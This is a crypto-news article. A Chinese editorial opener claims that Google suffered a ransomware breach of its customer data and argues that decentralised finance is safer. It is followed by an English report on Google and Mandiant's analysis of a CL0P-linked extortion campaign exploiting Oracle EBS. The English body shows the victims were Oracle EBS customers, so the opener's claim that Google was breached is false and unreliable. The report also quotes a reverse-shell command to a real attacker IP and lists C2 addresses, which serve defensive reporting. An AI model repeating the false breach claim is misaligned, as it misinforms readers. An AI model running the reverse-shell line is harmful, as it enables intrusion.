Google爆大规模客户数据遭勒索攻击——加密资产安全警钟再鸣

科技巨头陷入数据危机漩涡

当传统互联网巨头连基本数据防护都漏洞百出时，去中心化金融的价值主张正在被重新审视——毕竟在区块链上，你的私钥永远只属于你自己。

安全防线全面崩塌

攻击者不仅突破了谷歌的多层安全防护，更掌握了足以进行勒索的"海量客户数据"。这让人不禁想起传统金融机构那些年复一年的数据泄露丑闻——只不过这次轮到科技巨头在安全课上摔了跟头。

加密世界的应对之道

当中心化存储成为黑客的提款机，分布式账本技术正在用数学证明的方式重构信任体系。智能合约的透明执行、非托管钱包的自主掌控，都在无声地嘲讽着传统数据管理模式的陈旧与脆弱。

金融安全的未来图景

这次事件再次证明：在数字时代，将命运交给第三方保管无异于在流沙上建城堡。或许那些还在质疑加密货币安全性的传统金融人士应该先看看自家后院——毕竟当谷歌都能被攻破时，还有什么中心化数据库敢自称绝对安全？

Google and Mandiant reveal zero-day exploitation 

According to Google’s report, the attackers sent a “high volume” of emails to executives across multiple organizations, alleging breaches of their Oracle EBS environments and threatening to publish stolen data unless a ransom was paid. 

The emails, sent from hundreds of compromised third-party accounts, included contact addresses, [email protected] and [email protected], previously linked to the CL0P data leak site.

Google and Mandiant’s joint investigation found that the exploitation activity dates back to as early as July 2025, possibly linked to a zero-day vulnerability now tracked as CVE-2025-61882. In some cases, the attackers reportedly exfiltrated “a significant amount of data” from affected organizations.

Oracle stated that the exploited flaws had been fixed in July, but later issued emergency updates on October 4 to address additional vulnerabilities. Oracle told its customers to use the latest critical patch updates and stressed that staying current on all patches is essential to prevent compromise.

The CL0P extortion brand has been active since 2020 and is historically tied to the FIN11 cybercrime group. It has previously targeted managed file transfer systems like MOVEit, GoAnywhere, and Accellion FTA. Those campaigns followed a similar pattern of the mass exploitation of zero-day vulnerabilities, theft of sensitive data, and extortion weeks later. 

At the time of the report, no new victims from this incident had appeared on CL0P’s data leak site. 

Complex, multi-stage Java implants

Google and Mandiant’s technical breakdown reveals that the attackers used multiple exploit chains targeting Oracle EBS components, including UiServlet and SyncServlet, to achieve remote code execution and plant multi-stage Java implants.

In July 2025 there was suspicious activity that involved HTTP requests to /OA_HTML/configurator/UiServlet. This suspicious activity was observed in another exploit that later surfaced in a Telegram group named “SCATTERED LAPSUS$ HUNTERS.” 

The leaked exploit made use of several advanced techniques to gain control over targeted servers, such as a server-side request forgery (SSRF), an authentication bypass, and a XSL template injection.

By August 2025, the attackers began using another tool called SyncServlet to make and run harmful templates inside the EBS database. These templates contained Base64-encoded XSL payloads that loaded Java-based malware directly into memory. 

Among the identified implants were GOLDVEIN.JAVA, a downloader that retrieved second-stage payloads from attacker-controlled command servers, and a multi-layered chain dubbed SAGE, which installed persistent Java servlet filters for further exploitation.

After breaching the system, the attackers used the EBS account “applmgr” to explore the system, collect network and system details, and then install more malicious files. The attackers also used shell commands such as IP addr, netstat -an, and bash -i >& /dev/tcp/200.107.207.26/53 0>&1.

The IP addresses 200.107.207.26 and 161.97.99.49 were identified in exploitation attempts, while 162.55.17.215:443 and 104.194.11.200:443 were listed as command-and-control servers for the GOLDVEIN.JAVA payload.

GTIG has not formally linked the operation to any known group, but the campaign shares similarities with FIN11, which is a financially motivated cybercrime group that was previously associated with CL0P ransomware and large-scale data theft operations. 

Mandiant also noted that one of the compromised accounts used to send the extortion emails had been used in earlier FIN11-related attacks.

Users are urged to be suspicious of EBS database tables XDO_TEMPLATES_B and XDO_LOBS, especially those with names beginning with “TMP” or “DEF”, and to block external internet traffic from EBS servers to prevent more data extortion.

The organizations also recommend close monitoring of HTTP requests to endpoints like /OA_HTML/SyncServlet and /OA_HTML/configurator/UiServlet, and analyzing memory dumps for evidence of in-memory Java payloads.

Google warned that CL0P-linked groups will almost certainly continue to dedicate their resources to acquiring zero-day exploits.

If you're reading this, you’re already ahead. Stay there with our newsletter.